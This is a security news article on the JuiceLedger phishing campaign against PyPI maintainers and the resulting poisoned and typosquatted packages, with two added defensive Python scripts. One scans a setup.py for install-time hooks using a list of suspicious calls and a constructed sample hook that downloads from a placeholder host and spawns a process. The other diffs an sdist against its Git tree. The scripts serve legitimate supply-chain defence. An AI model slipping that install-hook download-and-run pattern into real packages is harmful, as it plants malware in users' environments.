Security researchers have identified a previously unknown group dubbed "JuiceLedger" as the threat actor behind a recent and first-known phishing campaign specifically targeting users of the Python Package Index (PyPI).
The threat actor first surfaced early this year and is focused on distributing a .NET-based malware called JuiceStealer for searching and stealing browser and cryptocurrency-related information from infected systems.
Initially, JuiceLedger distributed the information stealer via fraudulent Python installer applications. But starting in August, researchers from SentinelOne and Checkmarx observed the attacker also engaged in attempts to poison Python packages on the PyPI repository — presumably to distribute its malware to a wider audience.
The threat actor's modus operandi has involved targeting PyPI users with a phishing email informing them about Google implementing a new validation process for packages published on PyPI. The email claimed the measure was in response to a big increase in malicious PyPI packages getting uploaded to the registry. It warned developers to expeditiously validate their code packages with Google to avoid having them removed from the registry. "Packages not validated before September will be removed promptly," the phishing email noted.
PyPI users who clicked on the link were directed to a webpage, spoofed to look exactly like PyPI's login page. When users entered their credentials there, the page was designed to send that information to a JuiceLedger-controlled domain (linkedopports[dot]com). The caper appears to have convinced at least two developers to part with their credentials, which gave JuiceLedger a way to access and poison their relatively widely used PyPI packages with malicious code.
One of the infected packages (version 0.1.6 of "exotel"), for instance, had more than 480,000 total downloads at the time it was infected. The other package (versions 2.0.2 and 4.0.2 of "spam") had some 200,000 downloads. PyPI administrators have since removed both packages, according to Checkmarx.
When installed in a development environment, the code can search for Google Chrome passwords, query Chrome SQLite files, and launch a Python installer contained in the zip named "config.exe," SentinelOne said. The infostealer also looks for logs that contain the word "vault," likely because it is searching for cryptocurrency vaults, and reports the information back to an attacker-controlled command-and-control server over HTTP.
PyPI admins have also removed "several hundred" typosquatted packages that JuiceLedger published to PyPI as part of a broader effort to distribute its infostealer via the popular Python code repository, both SentinelOne and Checkmarx noted. Their analysis showed the threat actors had inserted a short code snippet in the packages for retrieving a signed variant of JuiceStealer from an attacker-controlled URL and executing it.
The code in the typosquatted packages was similar to the code that JuiceLedger had inserted into the two legitimate packages via its phishing campaign. The attacker-controlled URL that the typosquatted packages communicated with was also the same one that the poisoned versions of the "exotel" and "spam" packages communicated with. This allowed researchers at SentinelOne and Checkmarx to conclude that JuiceLedger was responsible both for the PyPI phishing campaign and for uploading the typosquatted packages to PyPI.
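Defenders triaging a suspect package can look for exactly this kind of install-time retrieve-and-execute logic statically, before the package is ever installed. The following is an added example for this article, not tooling from SentinelOne, Checkmarx, or PyPI: it parses a setup.py with Python's ast module and flags setuptools command-class hooks (which run during `pip install`) together with calls that fetch remote content or execute commands. The two setup.py samples and the example.invalid URL are constructed for the demo and do not reproduce JuiceLedger's actual snippet.

```python
"""Static triage of a setup.py for install-time code that fetches remote content
or executes commands.  Added example for this article, not SentinelOne's or
Checkmarx's tooling.  The two setup.py samples below are constructed for the
demo; the URL is a placeholder, not a real indicator."""
import ast

# Dotted call targets that should not run while a library is being installed.
SUSPICIOUS_FULL = {
    "subprocess.run", "subprocess.call", "subprocess.check_call",
    "subprocess.check_output", "os.popen", "requests.get", "requests.post",
}
# Bare names matched on the last dotted component, so both
# `from subprocess import Popen` and `urllib.request.urlopen` are caught.
SUSPICIOUS_BARE = {"exec", "eval", "urlopen", "urlretrieve", "Popen", "system", "b64decode"}
# setuptools command classes whose `run` method executes at install/build time.
HOOK_BASES = {"install", "develop", "egg_info", "build_py"}


def _call_name(node):
    """Return the dotted name a Call targets, e.g. 'urllib.request.urlopen'."""
    func, parts = node.func, []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def scan_setup_source(source):
    """Return a line-sorted list of (line, description) findings for one setup.py."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                base_name = base.id if isinstance(base, ast.Name) else getattr(base, "attr", "")
                if base_name in HOOK_BASES:
                    findings.append((node.lineno, f"class {node.name} hooks setuptools command '{base_name}'"))
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in SUSPICIOUS_FULL or name.rsplit(".", 1)[-1] in SUSPICIOUS_BARE:
                findings.append((node.lineno, f"call to {name}"))
    return sorted(findings)


# Constructed sample: an install hook that downloads and runs something.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import subprocess, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        # placeholder URL constructed for the demo, not a real indicator
        data = urllib.request.urlopen("https://example.invalid/payload").read()
        subprocess.Popen(["placeholder-command"])

setup(name="example-pkg", version="0.0.1", cmdclass={"install": PostInstall})
'''

# Constructed sample: an ordinary setup.py with no install-time behaviour.
BENIGN_SETUP_PY = '''\
from setuptools import setup, find_packages

setup(name="example-pkg", version="0.0.1", packages=find_packages())
'''

if __name__ == "__main__":
    for label, src in (("suspicious sample", SAMPLE_SETUP_PY), ("benign sample", BENIGN_SETUP_PY)):
        print(f"{label}:")
        for line, what in scan_setup_source(src) or [(0, "no findings")]:
            print(f"  line {line}: {what}")
```

The scanner is a triage aid, not a verdict: a legitimate package may subclass `install` for a post-install step, and an obfuscated payload may hide behind `getattr` or string-built imports that this name matching will not see. Its value is in forcing a human look at any package whose setup.py does more than declare metadata.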
JuiceLedger's attack on PyPI in August represents a dangerous escalation in the threat actor's efforts to distribute its information stealer, SentinelOne said. "In August 2022, the threat actor engaged in poisoning open-source packages as a way to target a wider audience with the infostealer through a supply chain attack, raising the threat level posed by this group considerably."
Popular — but Not the Only — Target
PyPI recently has become a popular target for attackers trying to poison software supply chains. Countless organizations use the code published in the repository to build their applications, so by poisoning packages on the registry, attackers can potentially reach a wide audience with relatively little effort. Recent examples include threat actors inserting malicious package installation code in 10 packages published to PyPI, another incident in which some 300 developers inadvertently downloaded a package for installing Cobalt Strike from the registry, and one in which a school-age hacker uploaded ransomware to the registry to see what would transpire.
PyPI is far from the only code repository that attackers have targeted recently. Security vendors have reported numerous similar incidents involving other widely used registries such as npm and Maven Central. The trend has heightened attention on software supply chain security issues, especially because of the potential for nation-state backed adversaries — like the Russian threat actor behind the SolarWinds compromise — exploiting the same tactic in their attack campaigns.
Attackers are taking advantage of the fact that developers and organizations will always need to use open source packages, says Amitai Ben, threat intelligence researcher at SentinelOne.
The best way to minimize exposure for those contributing open source code to public repositories is to enable two-factor authentication (2FA) on their user account in package managers. That minimizes the risk of account takeover by malicious actors.
Users of open source packages, meanwhile, need to know that popular packages are often connected to Git repositories from which the development process is taking place. "Discrepancies between the repository and the package on the package manager can be a sign of suspicious activity and account takeover," Ben says.
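One way to turn that advice into a concrete check is to diff what a published release actually ships against the project's Git tree at the release tag. The following is an added example for this article, not tooling from SentinelOne, Checkmarx, or PyPI: it reads a source distribution (sdist) tarball, strips the setuptools-generated metadata, and reports files the sdist adds beyond the repository and files whose bytes differ. Both the "repository" and the "published" file sets are constructed in memory for the demo; in practice the repository side would come from `git ls-files` at the tag and the sdist from `pip download --no-binary :all: <pkg>==<version>`.

```python
"""Compare the files shipped in a PyPI sdist against the project's Git tree.
Added example for this article, not SentinelOne's or Checkmarx's tooling.
Both file sets below are constructed for the demo."""
import io
import tarfile

# Constructed Git tree at the release tag: path -> file contents.
REPO_FILES = {
    "setup.py": b'from setuptools import setup\nsetup(name="examplepkg", version="0.0.1")\n',
    "examplepkg/__init__.py": b'def hello():\n    return "hello"\n',
    "README.md": b"# examplepkg\n",
}

# Constructed contents of the published sdist: setup.py gained a line and a
# module appeared that the repository never contained.
PUBLISHED_FILES = dict(REPO_FILES)
PUBLISHED_FILES["setup.py"] = REPO_FILES["setup.py"] + b"import examplepkg._loader\n"
PUBLISHED_FILES["examplepkg/_loader.py"] = b"# module not present in the Git repository\n"

# setuptools writes PKG-INFO and *.egg-info into every sdist; their absence
# from Git is expected and must not be reported as a discrepancy.
GENERATED = {"PKG-INFO"}


def build_sdist(files, top="examplepkg-0.0.1"):
    """Pack a path -> bytes mapping into an in-memory .tar.gz laid out like an sdist."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo(f"{top}/{path}")
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def sdist_files(sdist):
    """Read an sdist's regular files into path -> bytes, dropping the top-level
    directory prefix and setuptools-generated metadata."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(sdist), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            rel = member.name.split("/", 1)[1] if "/" in member.name else member.name
            if rel in GENERATED or ".egg-info/" in rel:
                continue
            out[rel] = tar.extractfile(member).read()
    return out


def compare_to_repo(sdist, repo):
    """Return files the sdist adds beyond the repo and files whose bytes differ."""
    shipped = sdist_files(sdist)
    added = sorted(p for p in shipped if p not in repo)
    modified = sorted(p for p in shipped if p in repo and shipped[p] != repo[p])
    return {"added": added, "modified": modified}


if __name__ == "__main__":
    report = compare_to_repo(build_sdist(PUBLISHED_FILES), REPO_FILES)
    print("files in sdist but not in Git:", report["added"])
    print("files whose contents differ:  ", report["modified"])
```

A non-empty `added` or `modified` list is not proof of compromise (release tooling legitimately generates version files, for instance), but a changed setup.py or an unexplained new module in a release that the maintainer's repository does not show is the kind of discrepancy the quote above describes, and it is cheap to check for in CI before a dependency is promoted.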